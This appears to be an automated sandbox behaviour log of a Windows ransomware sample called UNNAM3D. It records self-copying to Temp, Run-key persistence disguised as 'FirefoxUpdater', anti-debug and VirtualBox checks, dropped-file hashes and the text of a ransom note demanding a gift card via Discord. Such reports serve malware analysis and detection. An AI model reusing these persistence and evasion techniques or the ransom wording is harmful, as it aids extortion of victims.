Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 19315910 True 1
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 131520 False 1
Environment Get Environment String name = UKKED False 3
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, type = file_attributes False 1
File Copy source_filename = C:\Users\WhuOXYsD\Desktop\gblyrzexggw.exe, destination_filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE True 1
File Delete filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE:Zone.Identifier False 1
Environment Get Environment String name = UKKED False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Environment Get Environment String name = UKKED False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = FirefoxUpdater, type = REG_NONE False 1
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = FirefoxUpdater, data = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, size = 98, type = REG_SZ True 1
Process Create process_name = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, show_window = SW_SHOWNORMAL True 1
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 2
Thread 0x8fc
Category Operation Information Success Count Logfile
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Module Get Handle module_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe, base_address = 0x1360000 True 4
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e125dd True 1
Fn
Window Set Attribute window_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, index = -4, new_long = 2011243997 True 1
Fn
Module Unmap process_name = c:\users\whuoxysd\desktop\gblyrzexggw.exe True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0x8d8
71 0
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 10878994 True 16
Fn
System Get Time type = Ticks, time = 10879010 True 233
Fn
System Get Time type = Ticks, time = 10885718 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 25
Fn
Thread 0xc4
10 0
Category Operation Information Success Count Logfile
System Sleep duration = 20 milliseconds (0.020 seconds) True 10
Fn
Process #2: unnam3d.exe
627 0
Information Value
ID #2
File Name c:\users\whuoxysd\appdata\local\temp\unnam3d.exe
Command Line "C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE"
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:37, Reason: Child Process
Unmonitor End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration 00:04:46
OS Process Information
Information Value
PID 0x948
Parent PID 0x15c (c:\users\whuoxysd\desktop\gblyrzexggw.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x248
0x884
0x86C
0x868
0x888
0x95C
0x960
0x954
0x974
0xAD8
Hook Information
Type Installer Target Size Information Actions
Code agiledotnetrt.dll:+0xfc2e6 ntdll.dll:DbgBreakPoint+0x0 1 bytes -
Code agiledotnetrt.dll:+0x4b698 clrjit.dll:sxsJitStartup+0x1e3bd 4 bytes -
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\Users\WhuOXYsD\AppData\Local\Temp\Wallpaper.png 498.13 KB MD5: 9fe566aa83d07bc948f5a54e86c37214
SHA1: a1da653bd2d3fa8e0da40a261e2fae3ef5d24293
SHA256: f8681cc352768593054fa68706127f28810fad25aee6c108ddf4ae3c1655395e
SSDeep: 12288:4ekXjvAyvEQ8ZeK/+1VTArMH7k4ds9t4WJHpH8Ea4GfY+OzsC:LkXDbMZ21Vs74dsnZJHpHnacwC
False
C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe 2.17 MB MD5: 1e3a2a966f593ad33125f26916267008
SHA1: 38b1a547ddee671edeee7385cac138458a6a6858
SHA256: b18c9b9200e354f81882b29dc8143ec5d6f2b731cf4c7da3800e339ffb3c8827
SSDeep: 49152:m2IoCBtJnxlyU/mWhRcQYhie6/UIdjjQuctXnFDu3nAzNjteyUHBdH3y2:xrCBrtcy/lfkD0nANte9BpC2
False
Threads
Thread 0x248
310 0
Category Operation Information Success Count Logfile
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x71c00000 True 1
Fn
Module Load module_name = user32.dll, base_address = 0x76d60000 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x771a0000 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77de0000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x75c10000 True 1
Fn
Module Load module_name = shlwapi.dll, base_address = 0x77360000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x769b11a9 True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Debug Hide c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = IsUserAnAdmin, address_out = 0x75c644f5 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System, value_name = EnableLUA, data = 1 True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe True 1
Fn
Debug Check for Presence c:\users\whuoxysd\appdata\local\temp\unnam3d.exe False 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x77dffda0 True 1
Fn
System Get Info type = SYSTEM_MODULE_INFORMATION True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, value_name = DriverDesc, data = 83 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = VideoBiosVersion, data = 76 False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Hardware\description\System, value_name = SystemBiosVersion, data = 76 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\crypt32.dll, base_address = 0x77240000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\psapi.dll, base_address = 0x76e60000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\version.dll, base_address = 0x75870000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77e0e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlLeaveCriticalSection, address_out = 0x77e02270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlEnterCriticalSection, address_out = 0x77e022b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlInitializeCriticalSection, address_out = 0x77e12c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlReAllocateHeap, address_out = 0x77e21f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlSizeHeap, address_out = 0x77e13002 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x71c1142e True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, type = file_attributes True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\88044b52-bb1c-4d13-820b-fd46b551698e\AgileDotNetRT.dll, base_address = 0x71c00000 True 1
Fn
Module Get Address module_name = c:\users\whuoxysd\appdata\local\temp\88044b52-bb1c-4d13-820b-fd46b551698e\agiledotnetrt.dll, function = _Initialize, address_out = 0x71c1142e True 1
Fn
Module Load module_name = clrjit.dll, base_address = 0x75260000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, function = getJit, address_out = 0x752af70e True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 260 True 1
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, desired_access = FILE_READ_DATA, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 510104, size_out = 510104 True 1
Fn
Data
Environment Get Environment String name = UKKED False 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:09 (UTC) True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x75040000 True 1
Fn
Module Get Handle module_name = comctl32.dll, base_address = 0x0 False 1
Fn
Module Load module_name = comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x76d60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e125dd True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 84674782 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 9
Fn
Module Load module_name = RichEd20.DLL, base_address = 0x74e20000 True 1
Fn
Module Get Filename module_name = RichEd20.DLL, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Windows\system32\RichEd20.DLL, size = 260 True 1
Fn
File Get Info filename = C:\Windows\system32\RichEd20.DLL, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 2
Fn
Environment Get Environment String name = UKKED False 4
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create window_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, wndproc_parameter = 0 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 4
Fn
Environment Get Environment String name = UKKED False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE.config, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 6
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 84674982 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 2
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 21
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 1
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x75040000 True 30
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 84675710 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 84675750 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 327968 False 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 327968 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
System Get Cursor x_out = 170, y_out = 368 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -16, new_long = 33619968 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -20, new_long = 65536 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 1960976634 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 84675830 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -12, new_long = 197100 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 2
Fn
Window Create window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84677254 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197102 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 84677294 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 197054 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84677334 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197048 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84677374 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 197050 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720526 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 262582 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720590 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 262580 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720630 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 262578 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720670 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 459182 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1961605321 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 84720710 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 458788 False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, base_address = 0x74ea0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0xb00000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 2011243997 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 84720750 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 262588 False 1
Fn
Environment Get Environment String name = UKKED False 3
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Wallpaper.png, type = file_attributes False 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
